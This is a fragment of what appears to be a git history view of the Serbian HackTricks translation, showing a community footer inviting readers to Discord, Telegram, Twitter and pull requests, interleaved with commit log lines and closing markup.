			`* Pridružite se 💬 [Discord grupi](https://discord.gg/hRep4RUj7f) ili [telegram grupi](https://t.me/peass) ili pratite nas na Twitteru 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Podelite hakerske trikove slanjem PR-ova na [HackTricks](https://github.com/carlospolop/hacktricks) i [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
			`</details>`
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			`{% endhint %}`